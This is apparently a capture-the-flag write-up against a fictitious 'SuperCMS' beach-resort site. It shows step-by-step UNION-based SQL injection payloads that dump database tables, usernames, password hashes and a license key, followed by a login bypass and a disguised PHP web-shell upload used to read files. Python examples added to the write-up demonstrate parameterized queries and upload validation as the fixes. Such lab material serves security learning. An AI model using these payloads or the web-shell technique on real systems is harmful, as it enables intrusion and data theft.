[HACKME] BeachResort

Another CTF by decoder-ap. To complete the CTF I need to answer these questions:
1) What is the CMS administrator’s username?
2) What is the db name?
3) List the table names.
4) List all the files stored in the root directory of the superCMS admin site.
5) What is the license key?
6) List the contents of a very super secret file.

ANALYZING THE TARGET

When I opened my sandbox I saw a static HTML website for the BeachResort. It was made with SuperCMS (a fictitious name), which is in beta, so it may well be vulnerable to something. Looking at the SuperCMS banner URL at the bottom of the page I discovered a hidden folder, cmsadm, but browsing to it gave me a 403 error. So there is no index page in the admin panel and I need to guess the page names.

EXPLOITATION

After some research I discovered the login panel: cmsadm/login.php. It is a login form with a username and a password field. I tested it for SQL injection with sqlmap and it is exploitable, but I will perform the attack manually. First of all I tried to append a single quote to the username parameter, but nothing happened; then I tried a UNION-based SQLi:

user' UNION ALL SELECT 1-- -

And it worked! Notice that the query returns only one column, so I have a single column in which to inject. Then I found the database name:

user' UNION ALL SELECT database()-- -

This is the output:

supercms 

Now I discovered the table names:

user' UNION ALL SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1-- -

I increased the LIMIT offset from 0 to 2 in steps of 1 and retrieved the only three tables of the supercms database:

groups
license
operators

Then I retrieved the column names of the operators table:

user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 0,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 1,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 2,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 3,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 4,1-- -

And I got:

id
username
password
firstname
lastname

Now I dumped the data from the operators table:

user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 0, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 1, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 2, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 3, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 4, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 5, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 6, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 7, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 8, 1-- -

This is the output:

andrew 5f4dcc3b5aa765d61d8327deb882cf99
beatrice 5f4dcc3b5aa765d61d8327deb882cf99
arnold 5f4dcc3b5aa765d61d8327deb882cf99
barbara 5f4dcc3b5aa765d61d8327deb882cf99
eva 5f4dcc3b5aa765d61d8327deb882cf99
test1 5f4dcc3b5aa765d61d8327deb882cf99
test2 5f4dcc3b5aa765d61d8327deb882cf99
test3 5f4dcc3b5aa765d61d8327deb882cf99
cmsadmin 2bfea2ff114ccd30d95e176a1d25346a

Now I retrieved the license key:

user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='license' LIMIT 0,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='license' LIMIT 1,1-- -

The output:

id
license_key

Then:

user' UNION ALL SELECT license_key FROM license LIMIT 0, 1-- -

And I got the license key. Then I logged in as cmsadmin:

cmsadmin'-- -
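The two injections above (the one-column UNION and the `'-- -` login bypass) only work because the username is concatenated into the SQL text. This is an added example, not SuperCMS code or part of the original write-up: it assumes a login query of the shape `SELECT username FROM operators WHERE username='…' AND password='…'`, uses SQLite in place of MySQL, and shows the same payloads against the concatenated query and against a parameterized one.

```python
import hashlib
import sqlite3

# Constructed stand-in for the supercms.operators table, using SQLite in
# place of MySQL (so database() and information_schema do not exist here).
# The query shape is an assumption: the write-up never shows SuperCMS code.
# MD5 is used only to mirror the hashes in the write-up, not as advice.
OPERATORS = [
    ("andrew", hashlib.md5(b"constructed-pw-1").hexdigest()),
    ("cmsadmin", hashlib.md5(b"constructed-pw-2").hexdigest()),
]

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE operators (id INTEGER PRIMARY KEY, "
                "username TEXT, password TEXT)")
    con.executemany("INSERT INTO operators (username, password) VALUES (?, ?)",
                    OPERATORS)
    return con

def _rows(con, sql, params=()):
    # The single selected column, as strings; a SQL error is treated as a
    # failed login, the way a login form typically swallows it.
    try:
        return [str(r[0]) for r in con.execute(sql, params).fetchall()]
    except sqlite3.Error:
        return []

def login_vulnerable(con, username, password):
    # The username is pasted into the SQL text: a quote closes the literal,
    # "-- -" comments out the password check, and a one-column UNION (the
    # query returns exactly one column) puts chosen data in the result.
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT username FROM operators WHERE username = '%s' "
           "AND password = '%s'" % (username, pw_hash))
    return _rows(con, sql)

def login_safe(con, username, password):
    # Bound parameters: the driver passes the username as data, never as
    # SQL, so the same payloads are just usernames that match no row.
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT username FROM operators WHERE username = ? AND password = ?"
    return _rows(con, sql, (username, pw_hash))

if __name__ == "__main__":
    db = make_db()
    for user in ("cmsadmin'-- -", "user' UNION ALL SELECT 1-- -"):
        print(repr(user), "vulnerable:", login_vulnerable(db, user, "x"),
              "safe:", login_safe(db, user, "x"))
```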

Then I clicked the “Upload Image File” link, set up Burp Suite as a proxy and uploaded a .gif file, editing the content of the fake image to:

GIF89a

Then I changed the extension to .gif.php and forwarded the request. The upload succeeded and I browsed to /images/shell.gif.php. Now I can execute arbitrary PHP code. First of all I listed the contents of the cmsadm folder:

/images/shell.gif.php?cmd=print_r(scandir('../cmsadm'));

And I got this:

add_page.php
css
images
include
js
login.php
menu.php
scripts
secret.noop
update_page.php
upload.php

Then I read the secret file:

/images/shell.gif.php?cmd=echo readfile('../cmsadm/secret.noop');

CTF completed!
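The upload step above got through because the CMS accepted a double extension and, presumably, looked no further than the GIF89a header. As an added example (not SuperCMS code and not part of the write-up; the allow-list and magic bytes are constructed here), this is the upload validation that rejects shell.gif.php: exactly one allow-listed extension, a content check that merely complements it, and a server-chosen filename.

```python
import os
import secrets

# Allow-listed image extensions and the magic bytes each must start with.
# Constructed for this example; SuperCMS's real filter is not shown in the
# write-up, only that it accepted shell.gif.php with a GIF89a header.
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}

def validate_upload(filename, content):
    """Return (ok, detail): detail is the extension when ok, else the reason.

    The name must consist of a non-empty stem and exactly one allow-listed
    extension, so shell.gif.php fails before any content is looked at.
    """
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "expected exactly one extension"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    # The magic-byte check catches mislabelled files but is NOT a security
    # control on its own: the write-up's upload satisfied it by starting
    # the file with GIF89a. It only complements the extension allow-list.
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match claimed type"
    return True, ext

def stored_name(ext):
    # Discard the client-supplied name entirely; the server picks a random
    # stem and appends the validated extension. Store the result in a
    # directory where the web server does not execute scripts.
    return secrets.token_hex(16) + "." + ext

if __name__ == "__main__":
    for name, data in (("shell.gif.php", b"GIF89a junk"),
                       ("beach.gif", b"GIF89a\x01\x00\x01\x00")):
        print(name, validate_upload(name, data))
```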
